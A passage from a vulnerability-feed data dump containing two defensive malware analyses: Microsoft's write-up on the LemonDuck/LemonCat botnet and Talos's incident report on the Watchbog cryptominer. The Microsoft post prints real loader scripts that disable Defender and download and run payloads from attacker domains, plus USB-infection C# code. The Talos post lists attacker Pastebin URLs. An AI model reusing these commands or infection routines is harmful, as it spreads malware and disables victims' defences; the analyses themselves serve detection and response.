"href": "https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-30T00:08:30", "description": "_[Note: In this two-part blog series, we expose a modern malware infrastructure and provide guidance for protecting against the wide range of threats it enables. Part 1 covers the evolution of the threat, how it spreads, and how it impacts organizations. [Part 2](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>) is a deep dive on the attacker behavior and will provide investigation guidance.] _\n\nCombating and preventing today's threats to enterprises require comprehensive protection focused on addressing the full scope and impact of attacks. Anything that can gain access to machines\u2014even so-called commodity malware\u2014can bring in more dangerous threats. We\u2019ve seen this in banking Trojans serving as entry point for ransomware and hands-on-keyboard attacks. LemonDuck, an actively updated and robust malware that\u2019s primarily known for its botnet and cryptocurrency mining objectives, followed the same trajectory when it adopted more sophisticated behavior and escalated its operations. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.\n\nLemonDuck\u2019s threat to enterprises is also in the fact that it\u2019s a cross-platform threat. It\u2019s one of a few documented bot malware families that targets Linux systems as well as Windows devices. It uses a wide range of spreading mechanisms\u2014phishing emails, exploits, USB devices, brute force, among others\u2014and it has shown that it can quickly take advantage of news, events, or the release of new exploits to run effective campaigns. For example, in 2020, it was observed using COVID-19-themed lures in email attacks. In 2021, it exploited newly patched [Exchange Server vulnerabilities](<https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-vulnerabilities/>) to gain access to outdated systems.\n\nThis threat, however, does not just limit itself to new or popular vulnerabilities. It continues to use older vulnerabilities, which benefit the attackers at times when focus shifts to patching a popular vulnerability rather than investigating compromise. Notably, LemonDuck removes other attackers from a compromised device by getting rid of competing malware and preventing any new infections by patching the same vulnerabilities it used to gain access.\n\nIn the early years, LemonDuck targeted China heavily, but its operations have since expanded to include many other countries, focusing on the manufacturing and IoT sectors. Today, LemonDuck impacts a very large geographic range, with the United States, Russia, China, Germany, the United Kingdom, India, Korea, Canada, France, and Vietnam seeing the most encounters.\n\n\n\n_Figure 1. Global distribution of LemonDuck botnet activity_\n\nIn 2021, LemonDuck campaigns started using more diversified command and control (C2) infrastructure and tools. This update supported the marked increase in hands-on-keyboard actions post-breach, which varied depending on the perceived value of compromised devices to the attackers. Despite all these upgrades, however, LemonDuck still utilizes C2s, functions, script structures, and variable names for far longer than the average malware. This is likely due to its use of bulletproof hosting providers such as Epik Holdings, which are unlikely to take any part of the LemonDuck infrastructure offline even when reported for malicious actions, allowing LemonDuck to persist and continue to be a threat.\n\nIn-depth research into malware infrastructures of various sizes and operations provides invaluable insight into the breadth of threats that organizations face today. In the case of LemonDuck, the threat is cross-platform, persistent, and constantly evolving. Research like this emphasizes the importance of having comprehensive visibility into the wide range of threats, as well as the ability to correlate simple, disparate activity such as coin mining to more dangerous adversarial attacks.\n\n## LemonDuck and LemonCat infrastructure\n\nThe earliest documentation of LemonDuck was from its cryptocurrency campaigns in May 2019. These campaigns included PowerShell scripts that employed additional scripts kicked off by a scheduled task. The task was used to bring in the PCASTLE tool to achieve a couple of goals: abuse the EternalBlue SMB exploit, as well as use brute force or pass-the-hash to move laterally and begin the operation again. Many of these behaviors are still observed in LemondDuck campaigns today.\n\nLemonDuck is named after the variable \u201cLemon_Duck\u201d in one of the said PowerShell scripts. The variable is often used as the user agent, in conjunction with assigned numbers, for infected devices. The format used two sets of alphabetical characters separated by dashes, for example: \u201cUser-Agent: Lemon-Duck-[A-Z]-[A-Z]\u201d. The term still appears in PowerShell scripts, as well as in many of the execution scripts, specifically in a function called SIEX, which is used to assign a unique user-agent during botnet connection in attacks as recently as June 2021.\n\nLemonDuck frequently utilizes open-source material built off of resources also used by other botnets, so there are many components of this threat that would seem familiar. Microsoft researchers are aware of two distinct operating structures, which both use the LemonDuck malware but are potentially operated by two different entities for separate goals.\n\nThe first, which we call the \u201cDuck\u201d infrastructure, uses historical infrastructures discussed in this report. It is highly consistent in running campaigns and performs limited follow-on activities. This infrastructure is seldom seen in conjunction with edge device compromise as an infection method, and is more likely to have random display names for its C2 sites, and is always observed utilizing \u201cLemon_Duck\u201d explicitly in script.\n\nThe second infrastructure, which we call \u201cCat\u201d infrastructure\u2014for primarily using two domains with the word \u201ccat\u201d in them (_sqlnetcat[.]com_, _netcatkit[.]com_)\u2014emerged in January 2021. It was used in attacks exploiting vulnerabilities in Microsoft Exchange Server. Today, the Cat infrastructure is used in attacks that typically result in backdoor installation, credential and data theft, and malware delivery. It is often seen delivering the malware Ramnit.\n\n \n\n**Sample Duck domains** | **Sample Cat domains** \n---|--- \n \n * cdnimages[.]xyz\n * bb3u9[.]com\n * zz3r0[.]com\n * pp6r1[.]com\n * amynx[.]com\n * ackng[.]com\n * hwqloan[.]com\n * js88[.]ag\n * zer9g[.]com\n * b69kq[.]com\n| \n\n * sqlnetcat[.]com\n * netcatkit[.]com\n * down[.]sqlnetcat[.]com\n\n \n \nThe Duck and Cat infrastructures use similar subdomains, and they use the same task names, such as \u201cblackball\u201d. Both infrastructures also utilize the same packaged components hosted on similar or identical sites for their mining, lateral movement, and competition-removal scripts, as well as many of the same function calls.\n\nThe fact that the Cat infrastructure is used for more dangerous campaigns does not deprioritize malware infections from the Duck infrastructure. Instead, this intelligence adds important context for understanding this threat: the same set of tools, access, and methods can be re-used at dynamic intervals, to greater impact. Despite common implications that cryptocurrency miners are less threatening than other malware, its core functionality mirrors non-monetized software, making any botnet infection worthy of prioritization.\n\n\n\n_Figure 2. LemonDuck attack chain from the Duck and Cat infrastructures_\n\n## Initial access\n\nLemonDuck spreads in a variety of ways, but the two main methods are (1) compromises that are either edge-initiated or facilitated by bot implants moving laterally within an organization, or (2) bot-initiated email campaigns.\n\nLemonDuck acts as a loader for many other follow-on activities, but one if its main functions is to spread by compromising other systems. Since its first appearance, the LemonDuck operators have leveraged scans against both Windows and Linux devices for open or weakly authenticated SMB, Exchange, SQL, Hadoop, REDIS, RDP, or other edge devices that might be vulnerable to password spray or application vulnerabilities like CVE-2017-0144 (EternalBlue), CVE-2017-8464 (LNK RCE), CVE-2019-0708 (BlueKeep), CVE-2020-0796 (SMBGhost), CVE-2021-26855 (ProxyLogon), CVE-2021-26857 (ProxyLogon), CVE-2021-26858 (ProxyLogon), and CVE-2021-27065 (ProxyLogon).\n\nOnce inside a system with an Outlook mailbox, as part of its normal exploitation behavior, LemonDuck attempts to run a script that utilizes the credentials present on the device. The script instructs the mailbox to send copies of a phishing message with preset messages and attachments to all contacts.\n\nBecause of this method of contact messaging, security controls that rely on determining if an email is sent from a suspicious sender don\u2019t apply. This means that email security policies that reduce scanning or coverage for internal mail need to be re-evaluated, as sending emails through contact scraping is very effective at bypassing email controls.\n\nFrom mid-2020 to March 2021, LemonDuck\u2019s email subjects and body content have remained static, as have the attachment names and formats. These attachment names and formats have changed very little from similar campaigns that occurred in early 2020.\n\n \n\n**Sample email subjects ** | **Sample email body content** \n---|--- \n \n * The Truth of COVID-19\n * COVID-19 nCov Special info WHO\n * HALTH ADVISORY:CORONA VIRUS\n * WTF\n * What the fcuk\n * good bye\n * farewell letter\n * broken file\n * This is your order?\n| \n\n * Virus actually comes from United States of America\n * very important infomation for Covid-19\n * see attached document for your action and discretion.\n * the outbreak of CORONA VIRUS is cause of concern especially where forign personal have recently arrived or will be arriving at various intt in near future.\n * what's wrong with you?are you out of your mind!!!!!\n * are you out of your mind!!!!!what 's wrong with you?\n * good bye, keep in touch\n * can you help me to fix the file,i can't read it\n * file is brokened, i can't open it \n \nThe attachment used for these lures is one of three types: .doc, .js, or a .zip containing a .js file. Whatever the type, the file is named \u201creadme\u201d. Occasionally, all three types are present in the same email.\n\n\n\n_Figure 3. Sample email_\n\nWhile the JavaScript is detected by many security vendors, it might be classified with generic detection names. It could be valuable for organizations to sanitize JavaScript or VBScript executing or calling prompts (such as PowerShell) directly from mail downloads through solutions such as [custom detection rules](<https://docs.microsoft.com/en-us/microsoft-365/security/defender/custom-detection-rules?view=o365-worldwide>).\n\nSince LemonDuck began operating, the .zip to .js file execution method is the most common. The JavaScript has replaced the scheduled task that LemonDuck previously used to kickstart the PowerShell script. This PowerShell script has looked very similar throughout 2020 and 2021, with minor changes depending on the version, indicating continued development. Below is a comparison of changes from the most recent iterations of the email-delivered downloads and those from April of 2020.\n\n \n\n**April 2020 PowerShell script** | **March 2021 PowerShell script** \n---|--- \n`var cmd =new ActiveXObject(\"WScript.Shell\");var cmdstr=\"cmd /c start /b notepad \"+WScript.ScriptFullName+\" & powershell -w hidden -c \\\"if([Environment]::OSVersion.version.Major -eq '10'){Set-ItemProperty -Path 'HKCU:\\Environment' -Name 'windir' -Value 'cmd /c powershell -w hidden Set-MpPreference -DisableRealtimeMonitoring 1 & powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''http://t.awcna.com/mail.jsp?js*%username%*%computername%''+[Environment]::OSVersion.version.Major) &::';sleep 1;schtasks /run /tn \\\\Microsoft\\\\Windows\\\\DiskCleanup\\\\SilentCleanup /I;Remove-ItemProperty -Path 'HKCU:\\Environment' -Name 'windir' -Force}else{IEx(ne`w-obj`ect Net.WebC`lient).DownloadString('http://t.awcna.com/7p.php');bpu -method migwiz -Payload 'powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''http://t.awcna.com/mail.jsp?js*%username%*%computername%''+[Environment]::OSVersion.version.Majo \n//This File is broken.` | `var cmd =new ActiveXObject(\"WScript.Shell\");var cmdstr=\"cmd /c start /b notepad \"+WScript.ScriptFullName+\" & powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'z3r0.com/7p.php?0.7*mail_js*%username%*%computername%*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'z3r0.com/mail.jsp?js_0.7')\";cmd.run(cmdstr,0,1); \n//This File is broken.` \n \n \n\nAfter the emails are sent, the inbox is cleaned to remove traces of these mails. This method of self-spreading is attempted on any affected device that has a mailbox, regardless of whether it is an Exchange server.\n\nOther common methods of infection include movement within the compromised environment, as well as through USB and connected drives. These processes are often kicked off automatically and have occurred consistently throughout the entirety of LemonDuck\u2019s operation.\n\nThese methods run as a series of C# scripts that gather available drives for infection. They also create a running list of drives that are already infected based on whether it finds the threat already installed. Once checked against the running list of infected drives, these scripts attempt to create a set of hidden files in the home directory, including a copy of _readme.js_. Any device that has been affected by the LemonDuck implants at any time could have had any number of drives attached to it that are compromised in this manner. This makes this behavior a possible entry vector for additional attacks.\n\n`DriveInfo[] drives = DriveInfo.GetDrives(); \nforeach (DriveInfo drive in drives) \n{ \nif (blacklist.Contains(drive.Name)) \n{ continue;} \nConsole.WriteLine(\"Detect drive:\"+drive.Name); \nif (IsSupported(drive)) \n{ \nif (!File.Exists(drive + home + inf_data)) \n{ \nConsole.WriteLine(\"Try to infect \"+drive.Name); \nif (CreateHomeDirectory(drive.Name) && Infect(drive.Name)) \n{ \nblacklist.Add(drive.Name); \n} \n} \nelse { \nConsole.WriteLine(drive.Name+\" already infected!\"); \nblacklist.Add(drive.Name); \n} \n} \nelse{ \nblacklist.Add(drive.Name);`\n\n## Comprehensive protection against a wide-ranging malware operation\n\nThe cross-domain visibility and coordinated defense delivered by [Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) is designed for the wide range and increasing sophistication of threats that LemonDuck exemplifies. Microsoft 365 Defender has AI-powered industry-leading protections that can stop multi-component threats like LemonDuck across domains and across platforms. Microsoft 365 Defender for Office 365 detects the malicious emails sent by the LemonDuck botnet to deliver malware payloads as well as spread the bot loader. Microsoft Defender for Endpoint detects and blocks LemonDuck implants, payloads, and malicious activity on Linux and Windows.\n\nMore importantly, Microsoft 365 Defender provides rich investigation tools that can expose detections of LemonDuck activity, including attempts to compromise and gain a foothold on the network, so security operations teams can efficiently and confidently respond to and resolve these attacks. Microsoft 365 Defender correlates cross-platform, cross-domain signals to paint the end-to-end attack chain, allowing organizations to see the full impact of an attack. We also published a threat analytics article on this threat. Microsoft 365 Defender customers can use this report to get important technical details, guidance for investigation, consolidated incidents, and steps to mitigate this threat in particular and modern cyberattacks in general.\n\nIn Part 2 of this blog series, we share our in-depth technical analysis of the malicious actions that follow a LemonDuck infection. These include general, automatic behavior as well as human-initialized behavior. We will also provide guidance for investigating LemonDuck attacks, as well as mitigation recommendations for strengthening defenses against these attacks. **READ: [When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>).**\n\n \n\n_Microsoft 365 Defender Threat Intelligence Team_\n\nThe post [When coin miners evolve, Part 1: Exposing LemonDuck and LemonCat, modern mining malware infrastructure](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-22T16:00:57", "type": "mssecure", "title": "When coin miners evolve, Part 1: Exposing LemonDuck and LemonCat, modern mining malware infrastructure", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2017-8464", "CVE-2019-0708", "CVE-2020-0796", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-07-22T16:00:57", "id": "MSSECURE:E537BA51663A720821A67D2A4F7F7F0E", "href": "https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "talosblog": [{"lastseen": "2019-09-11T16:31:25", "bulletinFamily": "blog", "cvelist": ["CVE-2018-1000861"], "description": "[](<https://1.bp.blogspot.com/-T6tAdLkCVaQ/XWY957W13BI/AAAAAAAABSk/k4c65smKUDc6_ojm0cR3sGDMB3jvU1LagCLcBGAs/s1600/image5.png>)\n\n_By [Luke DuCharme](<https://twitter.com/_nTr0py>) and [Paul Lee](<https://twitter.com/paulleeio>)._\n\n \n\n\n## What Happened?\n\n \nCisco Incident Response (CSIRS) recently responded to an incident involving the Watchbog [cryptomining](<https://blog.talosintelligence.com/2018/01/malicious-xmr-mining.html>) botnet. The attackers were able to exploit [CVE-2018-1000861](<https://jenkins.io/security/advisory/2018-12-05/>) to gain a foothold and install the [Watchbog](<https://www.bleepingcomputer.com/news/security/bluekeep-scanner-discovered-in-watchbog-cryptomining-malware/>) malware on the affected systems. \n \nThis Linux-based malware relied heavily on Pastebin for command and control (C2) and operated openly. CSIRS gained an accurate understanding of the attacker's intentions and abilities on a customer's network by analyzing the various Pastebins. As the investigation progressed, CSIRS identified and de-obfuscated multiple pastes using artifacts left on compromised hosts. \n \nThere were some attempts at obfuscation, such as base64 encoding URLs and Pastebins, but the attack was still relatively simple to uncover - this attacker did not practice particularly strong operational security. \n \nThe attackers behind Watchbog claimed to be providing a service by identifying security vulnerabilities and aiding the organization by exploiting said weaknesses before any \"real\" hackers could do so. During the investigation, Cisco IR found signs of hosts becoming a part of a separate botnet around the time of the Watchbog activity. This raises serious doubts about the \"positive\" intentions of this adversary. Below is a message left on a compromised system by the adversary: \n \n \n\n\n[](<https://1.bp.blogspot.com/-ujTm3bnl6Y4/XXkIAdu_6hI/AAAAAAAACks/aoCA1ZLep9wEg5GhKjKVvWZ1K1xeMaqeQCLcBGAsYHQ/s1600/image5.png>)\n\n \n \n\n\n## What does Watchbog do? \n\n \nThe Watchbog botnet mines Monero cryptocurrency for its owners. While researching our variant we came across a [post](<https://www.alibabacloud.com/blog/return-of-watchbog-exploiting-jenkins-cve-2018-1000861_594798>) by Alibaba Cloud Security that provides some insights into Watchbog. This post coincided with our findings as we found an installation script that performs the following activities. \n \nFirst the installation script checks for running processes matching other cryptocurrency miners. If the system was previously configured to mine cryptocurrency, the installation script would terminate their execution using the kill command: \n \n\n\n[](<https://1.bp.blogspot.com/-A77Z058CSas/XXkIGxjwNUI/AAAAAAAACkw/LU4PzjqWeuUFTzi0ie-5HiUI9aqAvbX0gCLcBGAsYHQ/s1600/image19.png>)\n\n \n \n \nThe script then uses the touch command to determine its capability to write to various directories on the filesystem. \n \n\n\n[](<https://1.bp.blogspot.com/-hZreiq7fNuc/XXkIML9U97I/AAAAAAAACk0/3sYIcbzDfqwKO7yulMTA8cCO0AztQ9y2QCLcBGAsYHQ/s1600/image10.png>)\n\n \n \n \nIt also checks the architecture of the system to determine if it is executing on a 32-bit or 64-bit operating system and then makes three attempts to download and install a '[kerberods](<https://www.securityweek.com/jenkins-vulnerability-exploited-deliver-kerberods-malware>)' dropper using wget or curl. \n \n\n\n[](<https://1.bp.blogspot.com/-HPsroOq2qhA/XXkIQfB4zkI/AAAAAAAACk4/rsX2J_AT4QMKum9HYVpGSZllcOgdnJiDgCLcBGAsYHQ/s1600/image6.png>)\n\n \n \nDepending on permissions, the kerberods dropper is saved to one of the following directories: \n \n\n\n * The current working directory\n * /usr/bin\n * /usr/libexec\n * /usr/local/bin\n * /tmp\n * /usr/sbin\n \n \nThe script also retrieves the contents of a Pastebin URL containing a Monero wallet ID and mining information. CSIRS verified this as the same wallet ID as the one used by the attacker referenced in the Alibaba cloud post referenced earlier. \n \n\n\n[](<https://1.bp.blogspot.com/-h-5OOiEvD6E/XXkIVOCPzDI/AAAAAAAACk8/w64pGCY_Lu8_uETE9TIwJPdcz0U1BeqBACLcBGAsYHQ/s1600/image15.png>)\n\n \n \nThough the Pastebin URL in the previous screenshot is no longer accessible, the next step in the infection process is to download the cryptocurrency miner. We identified a script that 'kerberods' likely runs to reach out to GitHub to install the [XMR-Stak](<https://github.com/fireice-uk/xmr-stak>) Monero miner. \n \nThe main part of the script checks to see if a process called 'watchbog' is running. \n \n\n\n[](<https://1.bp.blogspot.com/-VwVkn4qRI_o/XXkIaqorPsI/AAAAAAAAClA/k_fDNgqtyPcLigl06zAGz_G7r8BqDgW2wCLcBGAsYHQ/s1600/image14.png>)\n\n \n \nIf the 'watchbog' process is not detected, the 'testa' or 'download' functions are called to install the version of the miner that's compatible with the host operating system and architecture and execute it to begin the mining process. \n \n\n\n[](<https://1.bp.blogspot.com/-by3LDE47GAs/XXkIfunS68I/AAAAAAAAClI/VPfDareDVrU8sqDw3zCfPrePM6I4GqaRwCLcBGAsYHQ/s1600/image16.png>)\n\n \n \n\n\n### 'Testa' function\n\n \nAs previously mentioned, the 'testa' function may be called to facilitate the infection process. Below is the code associated with this function. This code is responsible for writing the various configuration data used by the mining software. The function declares three variables and assigns base64 encoded data to each of them. \n \n\n\n[](<https://1.bp.blogspot.com/-TiGg3jydpBE/XXkIl9UjzpI/AAAAAAAAClU/UlvIXZKQwNscT8a8rOTwe9jtw54KI046wCLcBGAsYHQ/s1600/image18.png>)\n\n \n \nThe base64 encoded data is then decoded and written to various files. \n \n\n\n[](<https://1.bp.blogspot.com/-0T8gl-_prkE/XXkIqsy8W3I/AAAAAAAAClc/jxingEGh9NMTPJCXXZ5gQfhlQ9zOUZzbACLcBGAsYHQ/s1600/image17.png>)\n\n \n \nThe base64 encoded values correspond to the following: \n \n\n\n * St_64: This variable contains the URL of the Github repository that hosts the XMR-Stak mining client.\n * hXXps://github[.]com/fireice-uk/xmr-stak/releases/download/2.10.3/xmr-stak-linux-2.10.3-cpu.tar.xz \n \n \n\n\n * con_url: This variable contains the Pastebin URL that is used to host the configuration file for the mining client. \n * hXXps://pastebin[.]com/raw/YJH8sWr\n \n \n\n\n * Cpu_url: This variable contains an additional Pastebin URL. During our investigation the Pastebin URL was no longer accessible, but likely contains an additional configuration file to be used by the mining client.\n * hXXps://pastebin[.]com/raw/irzk5mSh\n \n \n\n\n * poo_url:This variable contains an additional Pastebin URL. During our investigation the Pastebin URL was no longer accessible, but likely contains an additional configuration file to be used by the mining client.\n * hXXps://pastebin[.]com/raw/aJkbTx6Y\n \n \nThe script then starts the Watchbog process and deletes the text file after downloading the encoded Pastebins as a text file and giving it execution permissions. The following screenshot shows the configuration file that is referenced by the con_url variable in the 'testa' function. \n \n\n\n[](<https://1.bp.blogspot.com/-xSeuN5oL4aY/XXkIxPOeUEI/AAAAAAAAClk/N635X8ceQ0IdzDY7GJTclbF4rBLEwDYvQCLcBGAsYHQ/s1600/image12.png>)\n\n \n \n\n\n### 'download' function\n\n \nThe following code is associated with the 'download' function referenced by the installation script previously described. Similar to what was described in the 'testa' function, it contains three declared variables with base64 encoded assignments. \n \n\n\n[](<https://1.bp.blogspot.com/-aqSmprNOZXk/XXkI2aAmTJI/AAAAAAAAClo/vtEn5t-UvDUoeNnUn4OPSW9fh8iooJYPwCLcBGAsYHQ/s1600/image13.png>)\n\n \n \nThese base64 encoded strings correspond to the following: \n \n\n\n * mi_64: This variable contains the Github URL that hosts the XMrig monero mining client. \n * hXXps://github[.]com/xmrig/xmrig/releases/download/v2.14.1/xmrig-2.14.1-xenial-x64.tar.gz\n \n \n\n\n * mi_32: This variable contains a Pixeldrain URL. During our investigation the URL was no longer accessible. \n * hXXps://pixeldrain[.]com/api/file/ZuVWceWG\n \n \n\n\n * der_ke: This variable contains a Pastebin URL. The URL was used to host a file containing the attacker(s) Monero Wallet ID for the miner to use. This Wallet ID is used to facilitate payment to the attacker. All Monero successfully mined by clients under the attacker's control will transfer the Monero to the Wallet ID specified in this file. The same wallet is included in the Alibaba Cloud post mentioned earlier.\n * hXXps://pastebin[.]com/raw/hURdMBLd\n \n \nThe download function then writes the contents retrieved from the specified URLs to various file locations. It then determines the architecture of the system and installs the appropriate mining client and executes it to initiate the mining process. \n \n\n\n[](<https://1.bp.blogspot.com/-3AAGL4Enxgc/XXkI8suvJoI/AAAAAAAAClw/wOHkv6rtfYMf9hYBUf_qJJDNon6L4ixNgCLcBGAsYHQ/s1600/image2.png>)\n\n \n \n \nThe following screenshot contains the contents of the Monero wallet configuration associated with the der_ke variable in the 'download' function described earlier. It specifies the configuration parameters that will be used by the mining client, including the Wallet ID, mining pool URL, and other parameters that can be used to control CPU usage, logging, etc. \n \n\n\n[](<https://1.bp.blogspot.com/-f3DJaaFacSo/XXkJB_E7xYI/AAAAAAAACl0/DUEfC02BOTcFYExE4hGsDqyBd8Ek6ZuIgCLcBGAsYHQ/s1600/image8.png>)\n\n \n \n\n\n## Lateral movement via SSH\n\n \nCSIRS identified that the adversary was using SSH to spread laterally. Although local logs were unavailable, we were able to use network logs to gain an understanding of how the malware was spreading. As we viewed the logs, it was easy to determine Watchbog's lateral movement mechanism because they were generating a large amount of SSH traffic. This could have been easily detected using internal traffic flow monitoring, such as with StealthWatch Cloud or other netflow-monitoring capability. \n \nThe following Bash script was used to facilitate the lateral movement process. It retrieves the contents of the known_hosts file on the infected system and then attempts to SSH into those systems. It also checks for the existence of SSH keys and leverages them to authenticate to the systems in the known_hosts file. If successful, it will retrieve the contents of the Pastebin URL previously described and initiate the infection process. \n \n\n\n[](<https://1.bp.blogspot.com/-5_xBPPopbZI/XXkJHnWUv6I/AAAAAAAACl8/s2tHmsrtZzc4gFcIFC2qNU6x8WBtCV5EACLcBGAsYHQ/s1600/image3.png>)\n\n \n \n \n\n\n## Lateral movement via Jenkins and Redis servers\n\n \nIn addition to leveraging SSH for lateral movement, the Watchbog adversary also attempted to leverage a Python script that scans for open Jenkins and Redis ports on the host's subnet. If the script finds any vulnerable servers, it attempts to use the curl or wget commands to retrieve a payload from Pastebin and execute it on the target. \n \nBased on the following string on line 71, the script targets CVE-2018-1000861, a vulnerability in the Staple web framework for versions up to Jenkins 2.138.1 or 2.145 which handles HTTP requests. It can provide attackers with RCE through particularly crafted URLs. A [post](<https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing-en/>) by Orange Tsai shows how to exploit this vulnerability by using cross reference objects to bypass ACL policy. \n \n\n\n[](<https://1.bp.blogspot.com/-3TxIe0-nZsM/XXkJM986stI/AAAAAAAACmA/FgUyo8tO6YIEaZio5VFrJdNgEZtHrpA7gCLcBGAsYHQ/s1600/image7.png>)\n\n \n \nThough the pastes accessed in the script were no longer available, we believe the payload was the installation script for the XMR-Stak miner previously described. The following Python script is also downloaded and executed from the XMR-Stak miner script described above in a function called 'party.' \n \n\n\n[](<https://1.bp.blogspot.com/-yYGvHmNwIzs/XXkJRnRvBjI/AAAAAAAACmI/E_GktVykecAKBOY6JBO9E0arUg6-rkkPwCLcBGAsYHQ/s1600/image4.png>)\n\n \n \nAs can be seen above, the payload variable contains a base64 encoded blob which is then decoded and written to the /tmp directory and executes it. This base64 encoded blob contains a Pastebin URL (hXXps://pastebin[.]com/raw/DzgYb9mu) which was used to host the following Python script. The Python script is used to facilitate the exploitation of the aforementioned vulnerability and initiate the infection process. The following screenshots are associated with this Python script. \n \n\n\n[](<https://1.bp.blogspot.com/-ffsJuwLdgf4/XXkJXUd3YgI/AAAAAAAACmQ/H4hum_c5VLwooskH2NtFwGmRRUGVB8qjwCLcBGAsYHQ/s1600/image21.png>)\n\n \n\n\n[](<https://1.bp.blogspot.com/-e3bawStVKtA/XXkJcurJEqI/AAAAAAAACmY/kwJwp-GBGAA1fwJDVQLoIGSl0cxhp_pOQCLcBGAsYHQ/s1600/image1.png>)\n\n \n \n\n\n[](<https://1.bp.blogspot.com/-sMDwBEFIxqI/XXkJiHMLZlI/AAAAAAAACmg/FpktKT_qR9geHhpanXh4ElHHfWgwHu6agCLcBGAsYHQ/s1600/image20.png>)\n\n \n \n \n\n\n## Persistence\n\n \nWatchbog's main persistence mechanism appears to have been using cron jobs. Below is the 'system' function from the 'kerberods' installation script which ensures the dropper will call out to Pastebins every hour for new information. The below screenshot shows the way that Watchbog configures the cron jobs responsible for achieving persistence on infected systems. \n \n\n\n[](<https://1.bp.blogspot.com/-0tfsLV-3M3U/XXkJoO47SsI/AAAAAAAACmk/Zomf6H49VL8zFtlb6NEuLWVMc2ZLlhfaQCLcBGAsYHQ/s1600/image11.png>)\n\n \n \nIn a post by Renato Marinho from Morphus Labs, he mentions a very interesting way 'kerberods' achieves persistence as well. If it has root privileges, it will download and load a library into the operating system which hooks parts of Glibc to modify Glibc's behavior. The post also specifies that the hooks allow the miner to run as anyone (including root) and also obfuscates the network connection to the mining pool as well as the Redis/Jenkins server scans. \n \n\n\n## Covering their tracks\n\n \nEvidence deletion has been identified in previous Watchbog variants. The Watchbog variant in our incident continued this trend. Evidence deletion was performed in a clear manner with files and logs being deleted or overwritten. The evidence deletion was typically added to the end of a handful of the Pastebin scripts, with the Xmr-stak download and the SSH Lateral Movement scripts being prime examples. The loss of those key pieces of evidence made analysis difficult, but not impossible. We were able to rely upon our clients centralized logging to fill in those holes, and the hosts themselves still had evidence. The most obvious being the malware variants themselves. \n \n\n\n## Conclusion \n\n \nUnpatched web applications vulnerable to known CVEs are a major target for attackers. Adversaries can leverage the vulnerability to gain a foothold into the web server and network environment in which the web server is deployed. Once that foothold has been established, the attacker can then connect to their C2, achieve persistent long-term access to the environment and spread laterally \u2014 which is exactly what happened in this case. The best way to prevent such activity would be to ensure that all enterprise web applications are up to date. Patching can cause some operational gaps and delays, so it\u2019s also important to have a maintenance window and a test environment to ensure that the new patches do not cause any issues. Identifying cryptomining activity can be done effectively by following security fundamentals. Establish a baseline for internal network traffic and if any significant deviations occur, identify and investigate them. Even if there is an existing theory for the activity. In this case, Watchbog generated a noticeable spike in the organization\u2019s SSH traffic. \n \n\n\n## Coverage\n\nIntrusion prevention systems such as [SNORT\u00ae](<https://snort.org/>) provide an effective tool to detect China Chopper activity due to specific signatures present at the end of each command. In addition to intrusion prevention systems, it is advisable to employ endpoint detection and response tools (EDR) such as [Cisco AMP for Endpoints](<https://www.cisco.com/c/en/us/products/security/amp-for-endpoints/index.html>), which gives users the ability to track process invocation and inspect processes. Try AMP for free [here](<http://cisco.com/go/tryamp>). \n \nAdditional ways our customers can detect and block these threats are listed below. \n \n\n\n[](<https://1.bp.blogspot.com/-yUCBqjJUM8M/XVF7-jm_JLI/AAAAAAAAAT8/hhCfba_JHMUia21PuHBNSgH416W1Gc9KwCLcBGAs/s1600/image6.png>)\n\n \n \nCisco Cloud Web Security ([CWS](<https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html>)) or[ ](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>)[Web Security Appliance (WSA](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>)) web scanning prevents access to malicious websites and detects malware used in these attacks. \n \n[Email 